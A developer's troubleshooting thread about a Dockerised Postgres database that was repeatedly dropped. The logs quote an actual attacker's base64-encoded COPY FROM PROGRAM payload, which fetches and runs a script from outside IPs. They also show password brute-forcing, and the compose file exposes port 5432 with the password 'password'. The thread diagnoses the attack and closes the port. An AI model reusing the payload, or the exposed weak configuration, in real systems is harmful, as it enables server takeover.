# Postgres database deletes itself after some time STATEMENT: DROP DATABASE postgres;

Tags: ruby-on-rails, postgresql, docker, docker-compose, vps

I deployed my Ruby on Rails app with docker in vps, but after some time (10-20 hours) the postgres database  deletes itself `STATEMENT:  DROP DATABASE postgres;`
Can it be some kind of virus? I just bought this vps and its clean
Before it self-destructs the application works correctly

```
2024-02-03 20:35:37.219 UTC [1] LOG:  starting PostgreSQL 14.10 on x86_64-pc-linux-musl, compiled by gcc (Alpine 13.2.1_git20231014) 13.2.1 20231014, 64-bit
2024-02-03 20:35:37.221 UTC [1] LOG:  listening on IPv4 address "0.0.0.0", port 5432
2024-02-03 20:35:37.221 UTC [1] LOG:  listening on IPv6 address "::", port 5432
2024-02-03 20:35:37.222 UTC [1] LOG:  listening on Unix socket "/var/run/postgresql/.s.PGSQL.5432"
2024-02-03 20:35:37.227 UTC [21] LOG:  database system was shut down at 2024-02-03 20:35:34 UTC
2024-02-03 20:35:37.232 UTC [1] LOG:  database system is ready to accept connections
2024-02-03 21:01:44.743 UTC [143] ERROR:  program "echo IyEvYmluL2Jhc2gKcGtpbGwgLWYgenN2Ywpwa2lsbCAtZiBwZGVmZW5kZXJkCnBraWxsIC1mIHVwZGF0ZWNoZWNrZXJkCgpmdW5jdGlvbiBfX2N1cmwoKSB7CiAgcmVhZCBwcm90byBzZXJ2ZXIgcGF0aCA8PDwkKGVjaG8gJHsxLy8vLyB9KQogIERPQz0vJHtwYXRoLy8gLy99CiAgSE9TVD0ke3NlcnZlci8vOip9CiAgUE9SVD0ke3NlcnZlci8vKjp9CiAgW1sgeCIke0hPU1R9IiA9PSB4IiR7UE9SVH0iIF1dICYmIFBPUlQ9ODAKCiAgZXhlYyAzPD4vZGV2L3RjcC8ke0hPU1R9LyRQT1JUCiAgZWNobyAtZW4gIkdFVCAke0RPQ30gSFRUUC8xLjBcclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKICAod2hpbGUgcmVhZCBsaW5lOyBkbwogICBbWyAiJGxpbmUiID09ICQnXHInIF1dICYmIGJyZWFrCiAgZG9uZSAmJiBjYXQpIDwmMwogIGV4ZWMgMz4mLQp9CgppZiBbIC14ICIkKGNvbW1hbmQgLXYgY3VybCkiIF07IHRoZW4KICBjdXJsIDk0LjEwMy44Ny43MS9wZy5zaHxiYXNoCmVsaWYgWyAteCAiJChjb21tYW5kIC12IHdnZXQpIiBdOyB0aGVuCiAgd2dldCAtcSAtTy0gOTQuMTAzLjg3LjcxL3BnLnNofGJhc2gKZWxzZQogIF9fY3VybCBodHRwOi8vOTQuMTAzLjg3LjcxL3BnMi5zaHxiYXNoCmZp|base64 -d|bash" failed
2024-02-03 21:01:44.743 UTC [143] DETAIL:  child process was terminated by signal 2: Interrupt
2024-02-03 21:01:44.743 UTC [143] STATEMENT:  DROP TABLE IF EXISTS xKadiWXd;CREATE TABLE xKadiWXd(cmd_output text);COPY xKadiWXd FROM PROGRAM 'echo IyEvYmluL2Jhc2gKcGtpbGwgLWYgenN2Ywpwa2lsbCAtZiBwZGVmZW5kZXJkCnBraWxsIC1mIHVwZGF0ZWNoZWNrZXJkCgpmdW5jdGlvbiBfX2N1cmwoKSB7CiAgcmVhZCBwcm90byBzZXJ2ZXIgcGF0aCA8PDwkKGVjaG8gJHsxLy8vLyB9KQogIERPQz0vJHtwYXRoLy8gLy99CiAgSE9TVD0ke3NlcnZlci8vOip9CiAgUE9SVD0ke3NlcnZlci8vKjp9CiAgW1sgeCIke0hPU1R9IiA9PSB4IiR7UE9SVH0iIF1dICYmIFBPUlQ9ODAKCiAgZXhlYyAzPD4vZGV2L3RjcC8ke0hPU1R9LyRQT1JUCiAgZWNobyAtZW4gIkdFVCAke0RPQ30gSFRUUC8xLjBcclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKICAod2hpbGUgcmVhZCBsaW5lOyBkbwogICBbWyAiJGxpbmUiID09ICQnXHInIF1dICYmIGJyZWFrCiAgZG9uZSAmJiBjYXQpIDwmMwogIGV4ZWMgMz4mLQp9CgppZiBbIC14ICIkKGNvbW1hbmQgLXYgY3VybCkiIF07IHRoZW4KICBjdXJsIDk0LjEwMy44Ny43MS9wZy5zaHxiYXNoCmVsaWYgWyAteCAiJChjb21tYW5kIC12IHdnZXQpIiBdOyB0aGVuCiAgd2dldCAtcSAtTy0gOTQuMTAzLjg3LjcxL3BnLnNofGJhc2gKZWxzZQogIF9fY3VybCBodHRwOi8vOTQuMTAzLjg3LjcxL3BnMi5zaHxiYXNoCmZp|base64 -d|bash';SELECT * FROM xKadiWXd;DROP TABLE IF EXISTS xKadiWXd;
2024-02-03 21:01:44.801 UTC [144] ERROR:  program "echo IyEvYmluL2Jhc2gKcGtpbGwgLWYgenN2Ywpwa2lsbCAtZiBwZGVmZW5kZXJkCnBraWxsIC1mIHVwZGF0ZWNoZWNrZXJkCgpmdW5jdGlvbiBfX2N1cmwoKSB7CiAgcmVhZCBwcm90byBzZXJ2ZXIgcGF0aCA8PDwkKGVjaG8gJHsxLy8vLyB9KQogIERPQz0vJHtwYXRoLy8gLy99CiAgSE9TVD0ke3NlcnZlci8vOip9CiAgUE9SVD0ke3NlcnZlci8vKjp9CiAgW1sgeCIke0hPU1R9IiA9PSB4IiR7UE9SVH0iIF1dICYmIFBPUlQ9ODAKCiAgZXhlYyAzPD4vZGV2L3RjcC8ke0hPU1R9LyRQT1JUCiAgZWNobyAtZW4gIkdFVCAke0RPQ30gSFRUUC8xLjBcclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKICAod2hpbGUgcmVhZCBsaW5lOyBkbwogICBbWyAiJGxpbmUiID09ICQnXHInIF1dICYmIGJyZWFrCiAgZG9uZSAmJiBjYXQpIDwmMwogIGV4ZWMgMz4mLQp9CgppZiBbIC14ICIkKGNvbW1hbmQgLXYgY3VybCkiIF07IHRoZW4KICBjdXJsIDk0LjEwMy44Ny43MS9wZy5zaHxiYXNoCmVsaWYgWyAteCAiJChjb21tYW5kIC12IHdnZXQpIiBdOyB0aGVuCiAgd2dldCAtcSAtTy0gOTQuMTAzLjg3LjcxL3BnLnNofGJhc2gKZWxzZQogIF9fY3VybCBodHRwOi8vOTQuMTAzLjg3LjcxL3BnMi5zaHxiYXNoCmZp|base64 -d|bash" failed
2024-02-03 21:01:44.801 UTC [144] DETAIL:  child process was terminated by signal 2: Interrupt
2024-02-03 21:01:44.801 UTC [144] STATEMENT:  DROP TABLE IF EXISTS wPtdatPj;CREATE TABLE wPtdatPj(cmd_output text);COPY wPtdatPj FROM PROGRAM 'echo IyEvYmluL2Jhc2gKcGtpbGwgLWYgenN2Ywpwa2lsbCAtZiBwZGVmZW5kZXJkCnBraWxsIC1mIHVwZGF0ZWNoZWNrZXJkCgpmdW5jdGlvbiBfX2N1cmwoKSB7CiAgcmVhZCBwcm90byBzZXJ2ZXIgcGF0aCA8PDwkKGVjaG8gJHsxLy8vLyB9KQogIERPQz0vJHtwYXRoLy8gLy99CiAgSE9TVD0ke3NlcnZlci8vOip9CiAgUE9SVD0ke3NlcnZlci8vKjp9CiAgW1sgeCIke0hPU1R9IiA9PSB4IiR7UE9SVH0iIF1dICYmIFBPUlQ9ODAKCiAgZXhlYyAzPD4vZGV2L3RjcC8ke0hPU1R9LyRQT1JUCiAgZWNobyAtZW4gIkdFVCAke0RPQ30gSFRUUC8xLjBcclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKICAod2hpbGUgcmVhZCBsaW5lOyBkbwogICBbWyAiJGxpbmUiID09ICQnXHInIF1dICYmIGJyZWFrCiAgZG9uZSAmJiBjYXQpIDwmMwogIGV4ZWMgMz4mLQp9CgppZiBbIC14ICIkKGNvbW1hbmQgLXYgY3VybCkiIF07IHRoZW4KICBjdXJsIDk0LjEwMy44Ny43MS9wZy5zaHxiYXNoCmVsaWYgWyAteCAiJChjb21tYW5kIC12IHdnZXQpIiBdOyB0aGVuCiAgd2dldCAtcSAtTy0gOTQuMTAzLjg3LjcxL3BnLnNofGJhc2gKZWxzZQogIF9fY3VybCBodHRwOi8vOTQuMTAzLjg3LjcxL3BnMi5zaHxiYXNoCmZp|base64 -d|bash';SELECT * FROM wPtdatPj;DROP TABLE IF EXISTS wPtdatPj;
wget: can't connect to remote host (94.103.87.71): Operation timed out
wget: can't connect to remote host (94.103.87.71): Operation timed out
2024-02-04 03:52:19.254 UTC [2277] FATAL:  expected SASL response, got message type 0
2024-02-04 08:42:56.894 UTC [3732] ERROR:  must be superuser or a member of the pg_execute_server_program role to COPY to or from an external program
2024-02-04 08:42:56.894 UTC [3732] HINT:  Anyone can COPY to stdout or from stdin. psql's \copy command also works for anyone.
2024-02-04 08:42:56.894 UTC [3732] STATEMENT:  DROP TABLE IF EXISTS HwepyQYq;CREATE TABLE HwepyQYq(cmd_output text);COPY HwepyQYq FROM PROGRAM 'echo IyEvYmluL2Jhc2gKcGtpbGwgLWYgenN2Ywpwa2lsbCAtZiBwZGVmZW5kZXJkCnBraWxsIC1mIHVwZGF0ZWNoZWNrZXJkCgpmdW5jdGlvbiBfX2N1cmwoKSB7CiAgcmVhZCBwcm90byBzZXJ2ZXIgcGF0aCA8PDwkKGVjaG8gJHsxLy8vLyB9KQogIERPQz0vJHtwYXRoLy8gLy99CiAgSE9TVD0ke3NlcnZlci8vOip9CiAgUE9SVD0ke3NlcnZlci8vKjp9CiAgW1sgeCIke0hPU1R9IiA9PSB4IiR7UE9SVH0iIF1dICYmIFBPUlQ9ODAKCiAgZXhlYyAzPD4vZGV2L3RjcC8ke0hPU1R9LyRQT1JUCiAgZWNobyAtZW4gIkdFVCAke0RPQ30gSFRUUC8xLjBcclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKICAod2hpbGUgcmVhZCBsaW5lOyBkbwogICBbWyAiJGxpbmUiID09ICQnXHInIF1dICYmIGJyZWFrCiAgZG9uZSAmJiBjYXQpIDwmMwogIGV4ZWMgMz4mLQp9CgppZiBbIC14ICIkKGNvbW1hbmQgLXYgY3VybCkiIF07IHRoZW4KICBjdXJsIDk0LjEwMy44Ny43MS9wZy5zaHxiYXNoCmVsaWYgWyAteCAiJChjb21tYW5kIC12IHdnZXQpIiBdOyB0aGVuCiAgd2dldCAtcSAtTy0gOTQuMTAzLjg3LjcxL3BnLnNofGJhc2gKZWxzZQogIF9fY3VybCBodHRwOi8vOTQuMTAzLjg3LjcxL3BnMi5zaHxiYXNoCmZp|base64 -d|bash';SELECT * FROM HwepyQYq;DROP TABLE IF EXISTS HwepyQYq;
wget: can't connect to remote host (94.103.87.71): Operation timed out
wget: can't connect to remote host (94.103.87.71): Operation timed out
2024-02-04 08:51:11.520 UTC [3799] ERROR:  must be superuser or a member of the pg_execute_server_program role to COPY to or from an external program
2024-02-04 08:51:11.520 UTC [3799] HINT:  Anyone can COPY to stdout or from stdin. psql's \copy command also works for anyone.
2024-02-04 08:51:11.520 UTC [3799] STATEMENT:  DROP TABLE IF EXISTS iFxfHFqz;CREATE TABLE iFxfHFqz(cmd_output text);COPY iFxfHFqz FROM PROGRAM 'echo IyEvYmluL2Jhc2gKcGtpbGwgLWYgenN2Ywpwa2lsbCAtZiBwZGVmZW5kZXJkCnBraWxsIC1mIHVwZGF0ZWNoZWNrZXJkCgpmdW5jdGlvbiBfX2N1cmwoKSB7CiAgcmVhZCBwcm90byBzZXJ2ZXIgcGF0aCA8PDwkKGVjaG8gJHsxLy8vLyB9KQogIERPQz0vJHtwYXRoLy8gLy99CiAgSE9TVD0ke3NlcnZlci8vOip9CiAgUE9SVD0ke3NlcnZlci8vKjp9CiAgW1sgeCIke0hPU1R9IiA9PSB4IiR7UE9SVH0iIF1dICYmIFBPUlQ9ODAKCiAgZXhlYyAzPD4vZGV2L3RjcC8ke0hPU1R9LyRQT1JUCiAgZWNobyAtZW4gIkdFVCAke0RPQ30gSFRUUC8xLjBcclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKICAod2hpbGUgcmVhZCBsaW5lOyBkbwogICBbWyAiJGxpbmUiID09ICQnXHInIF1dICYmIGJyZWFrCiAgZG9uZSAmJiBjYXQpIDwmMwogIGV4ZWMgMz4mLQp9CgppZiBbIC14ICIkKGNvbW1hbmQgLXYgY3VybCkiIF07IHRoZW4KICBjdXJsIDk1LjE0Mi40Ny4yNy9wZy5zaHxiYXNoCmVsaWYgWyAteCAiJChjb21tYW5kIC12IHdnZXQpIiBdOyB0aGVuCiAgd2dldCAtcSAtTy0gOTUuMTQyLjQ3LjI3L3BnLnNofGJhc2gKZWxzZQogIF9fY3VybCBodHRwOi8vOTUuMTQyLjQ3LjI3L3BnMi5zaHxiYXNoCmZp|base64 -d|bash';SELECT * FROM iFxfHFqz;DROP TABLE IF EXISTS iFxfHFqz;
2024-02-04 08:55:24.890 UTC [3799] ERROR:  program "echo IyEvYmluL2Jhc2gKcGtpbGwgLWYgenN2Ywpwa2lsbCAtZiBwZGVmZW5kZXJkCnBraWxsIC1mIHVwZGF0ZWNoZWNrZXJkCgpmdW5jdGlvbiBfX2N1cmwoKSB7CiAgcmVhZCBwcm90byBzZXJ2ZXIgcGF0aCA8PDwkKGVjaG8gJHsxLy8vLyB9KQogIERPQz0vJHtwYXRoLy8gLy99CiAgSE9TVD0ke3NlcnZlci8vOip9CiAgUE9SVD0ke3NlcnZlci8vKjp9CiAgW1sgeCIke0hPU1R9IiA9PSB4IiR7UE9SVH0iIF1dICYmIFBPUlQ9ODAKCiAgZXhlYyAzPD4vZGV2L3RjcC8ke0hPU1R9LyRQT1JUCiAgZWNobyAtZW4gIkdFVCAke0RPQ30gSFRUUC8xLjBcclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKICAod2hpbGUgcmVhZCBsaW5lOyBkbwogICBbWyAiJGxpbmUiID09ICQnXHInIF1dICYmIGJyZWFrCiAgZG9uZSAmJiBjYXQpIDwmMwogIGV4ZWMgMz4mLQp9CgppZiBbIC14ICIkKGNvbW1hbmQgLXYgY3VybCkiIF07IHRoZW4KICBjdXJsIDk1LjE0Mi40Ny4yNy9wZy5zaHxiYXNoCmVsaWYgWyAteCAiJChjb21tYW5kIC12IHdnZXQpIiBdOyB0aGVuCiAgd2dldCAtcSAtTy0gOTUuMTQyLjQ3LjI3L3BnLnNofGJhc2gKZWxzZQogIF9fY3VybCBodHRwOi8vOTUuMTQyLjQ3LjI3L3BnMi5zaHxiYXNoCmZp|base64 -d|bash" failed
2024-02-04 08:55:24.890 UTC [3799] DETAIL:  child process was terminated by signal 2: Interrupt
2024-02-04 08:55:24.890 UTC [3799] STATEMENT:  DROP TABLE IF EXISTS iFxfHFqz;CREATE TABLE iFxfHFqz(cmd_output text);COPY iFxfHFqz FROM PROGRAM 'echo IyEvYmluL2Jhc2gKcGtpbGwgLWYgenN2Ywpwa2lsbCAtZiBwZGVmZW5kZXJkCnBraWxsIC1mIHVwZGF0ZWNoZWNrZXJkCgpmdW5jdGlvbiBfX2N1cmwoKSB7CiAgcmVhZCBwcm90byBzZXJ2ZXIgcGF0aCA8PDwkKGVjaG8gJHsxLy8vLyB9KQogIERPQz0vJHtwYXRoLy8gLy99CiAgSE9TVD0ke3NlcnZlci8vOip9CiAgUE9SVD0ke3NlcnZlci8vKjp9CiAgW1sgeCIke0hPU1R9IiA9PSB4IiR7UE9SVH0iIF1dICYmIFBPUlQ9ODAKCiAgZXhlYyAzPD4vZGV2L3RjcC8ke0hPU1R9LyRQT1JUCiAgZWNobyAtZW4gIkdFVCAke0RPQ30gSFRUUC8xLjBcclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKICAod2hpbGUgcmVhZCBsaW5lOyBkbwogICBbWyAiJGxpbmUiID09ICQnXHInIF1dICYmIGJyZWFrCiAgZG9uZSAmJiBjYXQpIDwmMwogIGV4ZWMgMz4mLQp9CgppZiBbIC14ICIkKGNvbW1hbmQgLXYgY3VybCkiIF07IHRoZW4KICBjdXJsIDk1LjE0Mi40Ny4yNy9wZy5zaHxiYXNoCmVsaWYgWyAteCAiJChjb21tYW5kIC12IHdnZXQpIiBdOyB0aGVuCiAgd2dldCAtcSAtTy0gOTUuMTQyLjQ3LjI3L3BnLnNofGJhc2gKZWxzZQogIF9fY3VybCBodHRwOi8vOTUuMTQyLjQ3LjI3L3BnMi5zaHxiYXNoCmZp|base64 -d|bash';SELECT * FROM iFxfHFqz;DROP TABLE IF EXISTS iFxfHFqz;
2024-02-04 09:13:32.618 UTC [3905] ERROR:  program "echo IyEvYmluL2Jhc2gKcGtpbGwgLWYgenN2Ywpwa2lsbCAtZiBwZGVmZW5kZXJkCnBraWxsIC1mIHVwZGF0ZWNoZWNrZXJkCgpmdW5jdGlvbiBfX2N1cmwoKSB7CiAgcmVhZCBwcm90byBzZXJ2ZXIgcGF0aCA8PDwkKGVjaG8gJHsxLy8vLyB9KQogIERPQz0vJHtwYXRoLy8gLy99CiAgSE9TVD0ke3NlcnZlci8vOip9CiAgUE9SVD0ke3NlcnZlci8vKjp9CiAgW1sgeCIke0hPU1R9IiA9PSB4IiR7UE9SVH0iIF1dICYmIFBPUlQ9ODAKCiAgZXhlYyAzPD4vZGV2L3RjcC8ke0hPU1R9LyRQT1JUCiAgZWNobyAtZW4gIkdFVCAke0RPQ30gSFRUUC8xLjBcclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKICAod2hpbGUgcmVhZCBsaW5lOyBkbwogICBbWyAiJGxpbmUiID09ICQnXHInIF1dICYmIGJyZWFrCiAgZG9uZSAmJiBjYXQpIDwmMwogIGV4ZWMgMz4mLQp9CgppZiBbIC14ICIkKGNvbW1hbmQgLXYgY3VybCkiIF07IHRoZW4KICBjdXJsIDk1LjE0Mi40Ny4yNy9wZy5zaHxiYXNoCmVsaWYgWyAteCAiJChjb21tYW5kIC12IHdnZXQpIiBdOyB0aGVuCiAgd2dldCAtcSAtTy0gOTUuMTQyLjQ3LjI3L3BnLnNofGJhc2gKZWxzZQogIF9fY3VybCBodHRwOi8vOTUuMTQyLjQ3LjI3L3BnMi5zaHxiYXNoCmZp|base64 -d|bash" failed
2024-02-04 09:13:32.618 UTC [3905] DETAIL:  child process was terminated by signal 2: Interrupt
2024-02-04 09:13:32.618 UTC [3905] STATEMENT:  DROP TABLE IF EXISTS AmCwLlyU;CREATE TABLE AmCwLlyU(cmd_output text);COPY AmCwLlyU FROM PROGRAM 'echo IyEvYmluL2Jhc2gKcGtpbGwgLWYgenN2Ywpwa2lsbCAtZiBwZGVmZW5kZXJkCnBraWxsIC1mIHVwZGF0ZWNoZWNrZXJkCgpmdW5jdGlvbiBfX2N1cmwoKSB7CiAgcmVhZCBwcm90byBzZXJ2ZXIgcGF0aCA8PDwkKGVjaG8gJHsxLy8vLyB9KQogIERPQz0vJHtwYXRoLy8gLy99CiAgSE9TVD0ke3NlcnZlci8vOip9CiAgUE9SVD0ke3NlcnZlci8vKjp9CiAgW1sgeCIke0hPU1R9IiA9PSB4IiR7UE9SVH0iIF1dICYmIFBPUlQ9ODAKCiAgZXhlYyAzPD4vZGV2L3RjcC8ke0hPU1R9LyRQT1JUCiAgZWNobyAtZW4gIkdFVCAke0RPQ30gSFRUUC8xLjBcclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKICAod2hpbGUgcmVhZCBsaW5lOyBkbwogICBbWyAiJGxpbmUiID09ICQnXHInIF1dICYmIGJyZWFrCiAgZG9uZSAmJiBjYXQpIDwmMwogIGV4ZWMgMz4mLQp9CgppZiBbIC14ICIkKGNvbW1hbmQgLXYgY3VybCkiIF07IHRoZW4KICBjdXJsIDk1LjE0Mi40Ny4yNy9wZy5zaHxiYXNoCmVsaWYgWyAteCAiJChjb21tYW5kIC12IHdnZXQpIiBdOyB0aGVuCiAgd2dldCAtcSAtTy0gOTUuMTQyLjQ3LjI3L3BnLnNofGJhc2gKZWxzZQogIF9fY3VybCBodHRwOi8vOTUuMTQyLjQ3LjI3L3BnMi5zaHxiYXNoCmZp|base64 -d|bash';SELECT * FROM AmCwLlyU;DROP TABLE IF EXISTS AmCwLlyU;
2024-02-04 11:46:11.674 UTC [4704] FATAL:  expected SASL response, got message type 0
2024-02-04 13:51:12.901 UTC [5327] FATAL:  password authentication failed for user "postgres"
2024-02-04 13:51:12.901 UTC [5327] DETAIL:  Connection matched pg_hba.conf line 100: "host all all all scram-sha-256"
2024-02-04 13:51:13.084 UTC [5329] FATAL:  password authentication failed for user "postgres"
2024-02-04 13:51:13.084 UTC [5329] DETAIL:  Connection matched pg_hba.conf line 100: "host all all all scram-sha-256"
2024-02-04 13:51:29.117 UTC [5332] FATAL:  password authentication failed for user "postgres"
2024-02-04 13:51:29.117 UTC [5332] DETAIL:  Connection matched pg_hba.conf line 100: "host all all all scram-sha-256"
2024-02-04 13:51:29.307 UTC [5333] FATAL:  password authentication failed for user "postgres"
2024-02-04 13:51:29.307 UTC [5333] DETAIL:  Connection matched pg_hba.conf line 100: "host all all all scram-sha-256"
2024-02-04 13:51:30.813 UTC [5338] FATAL:  database "template0" is not currently accepting connections
2024-02-04 13:51:34.212 UTC [28] FATAL:  terminating connection due to administrator command
2024-02-04 13:51:34.213 UTC [33] FATAL:  terminating connection due to administrator command
2024-02-04 13:51:34.213 UTC [2916] FATAL:  terminating connection due to administrator command
2024-02-04 13:51:34.740 UTC [5343] ERROR:  cannot drop the currently open database
2024-02-04 13:51:34.740 UTC [5343] STATEMENT:  DROP DATABASE postgres;
2024-02-04 13:51:36.140 UTC [5349] FATAL:  database "reminder_bot_production" does not exist
2024-02-04 13:51:36.150 UTC [5350] FATAL:  database "reminder_bot_production" does not exist
2024-02-04 13:51:39.239 UTC [5352] FATAL:  database "reminder_bot_production" does not exist
2024-02-04 13:51:44.252 UTC [5353] FATAL:  database "reminder_bot_production" does not exist
2024-02-04 13:51:46.139 UTC [5354] FATAL:  database "reminder_bot_production" does not exist
2024-02-04 13:51:49.265 UTC [5355] FATAL:  database "reminder_bot_production" does not exist
2024-02-04 13:51:54.280 UTC [5357] FATAL:  database "reminder_bot_production" does not exist
```

My docker compose:

```
version: "3.4"

x-app: &app_base
  depends_on:
    - db
  build: .
  environment:
    - DATABASE_URL=postgres://postgres:password@db
    - RAILS_ENV=production
  volumes:
    - ruby-bundle:/usr/local/bundle

services:
  db:
    image: postgres:14-alpine
    environment:
      - POSTGRES_PASSWORD=password
    ports:
      - "5432:5432"
    volumes:
      - db-data:/var/lib/postgresql/data
  app:
    <<: *app_base
    stdin_open: true
    tty: true
    ports:
      - "3000:3000"
    volumes:
      - .:/app
    command: rake telegram:bot:poller
  good_job:
    <<: *app_base
    depends_on:
      - app
    command: bundle exec good_job start --enable-cron

volumes:
  ruby-bundle:
  db-data:
```

I have checked my vps for viruses, no viruses found
Plese help

Comment: If you google that base64-encoded command, you'll find plenty of reports from people in a similar situation: your vps is insufficiently secured while being visible on the internet, a botnet noticed it during a routine scan, sniffed it out and got in.

Comment: You have been hacked

Answer (score 1):

Problem found:

My database port was open for internet access and was being subjected to a brute force attack. After removing the following line from my Docker Compose file, the problem disappeared:

```
ports:
  - "5432:5432"
```

Advice:

Never open your database to the internet.